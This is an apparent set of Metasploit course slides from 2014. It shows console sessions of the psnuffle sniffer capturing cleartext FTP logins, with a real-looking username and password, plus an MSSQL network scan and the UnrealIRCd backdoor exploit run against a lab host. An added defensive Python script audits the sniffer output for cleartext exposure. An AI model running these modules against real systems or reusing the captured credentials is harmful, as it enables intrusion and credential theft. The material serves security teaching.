Metasploit 2 - WordPress.com


Be regular and consistent.
In everything, for your whole life.
Especially in matters relating to security.
Metasploit 2
Cerutti-IES 2014
What characterizes a good framework?
Frameworks
Microsoft SQL
Available payloads
Exiting (unloading) modules
• Command: back
Password Sniffing
> use auxiliary/sniffer/psnuffle
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/smb.rb...
msf auxiliary(psnuffle) > [*] Loaded protocol URL from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
host_int=2716808549&ns_map=71378968_201026015668248%2C685054872_9274989464&user_id=44464479&nid=1396008608701611341&ts=1415041703
[*] Failed FTP Login: 172.16.2.32:55773-143.106.10.149:21 >> fernandocerutti / baguinha
[*] HTTP GET: 172.16.2.32:51435-108.160.167.155:80 http://notify10.dropbox.com/subscribe?host_int=2716808549&ns_map=71378968_201026015668248%2C685054872_9274989464&user_id=44464479&nid=1396008608701611341&ts=1415041759
[*] Successful FTP Login: 172.16.2.32:55773-143.106.10.149:21 >> anonymous /
[*] HTTP GET: 172.16.2.32:51435-108.160.167.155:80 http://notify10.dropbox.com/subscribe?host_int=2716808549&ns_map=71378968_201026015668248%2C685054872_9274989464&user_id=44464479&nid=1396008608701611341&ts=1415041815
[*] Successful FTP Login: 172.16.2.32:55774-143.106.10.149:21 >> anonymous / caraca
HTTP without security: in plain text
[*] HTTP GET: 172.16.2.32:55870-189.45.193.236:80 http://www.google-analytics.com/__utm.gif?utmwv=5.6.0&utms=7&utmn=2092148068&utmhn=www.slideshare.net&utmt=event&utme=5(search_content*search_pageload*Description%20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=15.0%20r0&utmdt=%27metasploit%27%20on%20SlideShare&utmhid=1487026120&utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader%26q%3Dmetasploit&utmht=1415042586183&utmac=UA-23304661&utmcc=__utma%3D186399478.1164355194.1409685008.1415014839.1415042574.33%3B%2B__utmz%3D186399478.1414784276.30.12.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D186399478.member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~
[*] HTTP GET: 172.16.2.32:55886-189.45.193.245:80 http://t0.gstatic.com/favicon?q=tbn:ANd9GcQC6FFzVoDxm5kTE5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w
sniff
[*] HTTP GET: 172.16.2.49:40582-91.189.89.22:80 http://videosearch.ubuntu.com/v0/search?q=&split=true&form_factor=desktop
[*] HTTP GET: 172.16.2.49:46231-189.45.193.241:80 http://i.ytimg.com/vi/ROhRv09bCWU/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46232-189.45.193.241:80 http://i.ytimg.com/vi/mO1QBTG6EXs/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46233-189.45.193.241:80 http://i.ytimg.com/vi/GH7noNdd1l8/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:46234-189.45.193.241:80 http://i.ytimg.com/vi/GDlm84gSRv4/movieposter.jpg
[*] HTTP GET: 172.16.2.49:46235-189.45.193.241:80 http://i.ytimg.com/vi/vekNlWVqEnQ/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:41898-189.45.193.211:80 http://i.ytimg.com/vi/hWLN8AATXlw/movieposter.jpg
[*] HTTP GET: 172.16.2.49:38110-189.45.193.249:80 http://i.ytimg.com/vi/RKs6ikmrLgg/movieposter.jpg
[*] HTTP GET: 172.16.2.49:43160-189.45.193.236:80 http://i.ytimg.com/vi/ZQRONGsLu4A/mqdefault.jpg
[*] HTTP GET: 172.16.2.49:50594-72.21.91.75:80 http://s1.dmcdn.net/AMRhc/80x60-9ja.jpg
[*] HTTP GET: 172.16.2.49:50595-72.21.91.75:80 http://s1.dmcdn.net/tFBO/80x60-YN8.jpg
[*] HTTP GET: 172.16.2.49:50596-72.21.91.75:80 http://s1.dmcdn.net/oiaV/80x60-YM6.jpg
[*] HTTP GET: 172.16.2.49:50597-72.21.91.75:80 http://s2.dmcdn.net/zw9I/80x60-M5j.jpg
[*] HTTP GET: 172.16.2.49:50598-72.21.91.75:80 http://s2.dmcdn.net/MRil/80x60-2HI.jpg
[*] HTTP GET: 172.16.2.49:51624-189.45.193.207:80 http://i.ytimg.com/vi/DTBWoKjtur8/movieposter.jpg
[*] HTTP GET: 172.16.2.49:55606-189.45.193.222:80 http://i.ytimg.com/vi/SV0VxWxg0oI/movieposter.jpg
[*] HTTP GET: 172.16.2.49:33244-189.45.193.221:80 http://i.ytimg.com/vi/m2qB16oWYTs/movieposter.jpg
[*] HTTP GET: 172.16.2.49:56212-189.45.193.237:80 http://i.ytimg.com/vi/n6op2UcrOFg/movieposter.jp
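An added example, not part of the original slides: a defender's audit pass over output in the format shown above, listing which client/server pairs send credentials or query data in cleartext so those services can be moved to FTPS/SFTP or HTTPS. The sample lines, addresses and the `audit` function name are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in the sniffer's output format (documentation-range
# addresses, made-up credentials); not taken from the capture above.
SAMPLE = """\
[*] Failed FTP Login: 192.0.2.10:55773-198.51.100.5:21 >> alice / wrongpass
[*] Successful FTP Login: 192.0.2.10:55773-198.51.100.5:21 >> alice / s3cret
[*] Successful FTP Login: 192.0.2.11:55774-198.51.100.5:21 >> anonymous /
[*] HTTP GET: 192.0.2.10:51435-203.0.113.7:80 http://example.test/subscribe?user_id=1&ts=2
[*] HTTP GET: 192.0.2.12:40000-203.0.113.7:80 http://example.test/img.jpg
"""

LOGIN = re.compile(r"^\[\*\] (?:Successful|Failed) (\w+) Login: "
                   r"([\d.]+):\d+-([\d.]+:\d+) >> (\S+) /(.*)$")
HTTP_GET = re.compile(r"^\[\*\] HTTP GET: ([\d.]+):\d+-[\d.]+:\d+ (\S+)")

def audit(text):
    """Summarise cleartext exposure; passwords and parameter values are dropped."""
    logins = defaultdict(set)   # (protocol, client, server:port) -> usernames
    params = defaultdict(set)   # (client, HTTP host) -> query parameter names
    for line in text.splitlines():
        m = LOGIN.match(line)
        if m:
            proto, client, server, user, _password = m.groups()
            # Failed attempts count too: the credential still crossed the wire.
            if user.lower() != "anonymous":
                logins[(proto, client, server)].add(user)
            continue
        m = HTTP_GET.match(line)
        if m:
            client, url = m.groups()
            parts = urlsplit(url)
            names = {k for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
            if names:
                params[(client, parts.hostname)].update(names)
    return dict(logins), dict(params)

if __name__ == "__main__":
    logins, params = audit(SAMPLE)
    for (proto, client, server), users in sorted(logins.items()):
        print(f"{proto} credentials in cleartext: {client} -> {server} users={sorted(users)}")
    for (client, host), names in sorted(params.items()):
        print(f"HTTP query data in cleartext: {client} -> {host} params={sorted(names)}")
```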
MS SQL
msf > nmap -sU 192.168.0.0/24 -p1434
[*] exec: nmap -sU 192.168.0.0/24 -p1434
Starting Nmap 6.46 ( http://nmap.org ) at 2014-11-03 12:26 PST
Nmap scan report for 192.168.0.1
Host is up (0.049s latency).
PORT     STATE         SERVICE
1434/udp open|filtered ms-sql-m
MAC Address: 84:C9:B2:55:A7:03 (D-Link International)
Nmap scan report for 192.168.0.109
Host is up (0.0053s latency).
PORT STATE SERVICE
1434/udp closed ms-sql-m
MAC Address: 00:0C:29:6F:8D:07 (VMware)
Nmap scan report for 192.168.0.119
Host is up (0.17s latency).
PORT     STATE         SERVICE
1434/udp open|filtered ms-sql-m
MAC Address: 64:6C:B2:4E:62:B3 (Samsung Electronics Co.)
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 141 of 256 hosts (055% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 182 of 256 hosts (071% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 244 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >
Backdoor on Linux
• use exploit/unix/irc/unreal_ircd_3281_backdoor
• msf exploit(unreal_ircd_3281_backdoor) >
• msf exploit(unreal_ircd_3281_backdoor) > set RHOST 172.16.193.213
• RHOST => 172.16.193.213
• msf exploit(unreal_ircd_3281_backdoor) > exploit
Backdoor exploit output
Dotdefender
• Wget